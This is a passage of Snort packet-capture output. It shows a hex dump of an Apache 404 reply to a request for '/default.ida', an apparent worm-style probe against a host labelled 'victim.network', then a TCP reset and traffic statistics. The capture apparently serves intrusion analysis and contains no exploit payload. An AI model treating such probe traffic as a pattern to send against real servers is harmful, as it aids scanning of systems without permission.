3A 34 31 20 47 4D 54 0D 0A 53 65 72 8:11:41 GMT..Ser 76 65 72 3A 20 41 70 61 63 68 65 2F 31 2E 33 2E ver: Apache/1.3. 36 20 28 55 6E 69 78 29 20 20 28 52 65 64 20 48 6 (Unix) (Red H 61 74 2F 4C 69 6E 75 78 29 0D 0A 43 6F 6E 6E 65 at/Linux)..Conne 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F ction: close..Co 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 ntent-Type: text 2F 68 74 6D 6C 0D 0A 0D 0A 3C 21 44 4F 43 54 59 /html...... 34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C 2F 54 404 Not Found</T 49 54 4C 45 3E 0A 3C 2F 48 45 41 44 3E 3C 42 4F ITLE>.</HEAD><BO 44 59 3E 0A 3C 48 31 3E 4E 6F 74 20 46 6F 75 6E DY>.<H1>Not Foun 64 3C 2F 48 31 3E 0A 54 68 65 20 72 65 71 75 65 d</H1>.The reque 73 74 65 64 20 55 52 4C 20 2F 64 65 66 61 75 6C sted URL /defaul 74 2E 69 64 61 20 77 61 73 20 6E 6F 74 20 66 6F t.ida was not fo 75 6E 64 20 6F 6E 20 74 68 69 73 20 73 65 72 76 und on this serv 65 72 2E 3C 50 3E 0A 3C 2F 42 4F 44 59 3E 3C 2F er.<P>.</BODY></ 48 54 4D 4C 3E 0A HTML>. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.507577 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x3C 65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53715 IpLen:20 DgmLen:40 DF *****R** Seq: 0x55EAC877 Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =============================================================================== Snort processed 10 packets. Breakdown by protocol: Action Stats: TCP: 10 (100.000%) ALERTS: 0 UDP: 0 (0.000%) LOGGED: 0 ICMP: 0 (0.000%) PASSED: 0 ARP: 0 (0.000%) IPv6: 0 (0.000%) IPX: 0 (0.000%) OTHER: 0 (0.000%) =============================================================================== Fragmentation Stats: Fragmented IP Packets: 0 (0.000%) Rebuilt IP Packets: 0 Frag elements used: 0 Discarded(incomplete): 0 Discarded(timeout): 0 =============================================================================== TCP Stream Reassembly Stats: TCP Packets Used: 0 (0.000%) Reconstructed Packets: 0 (0.000%) Streams Reconstructed: 0 ===============================================================================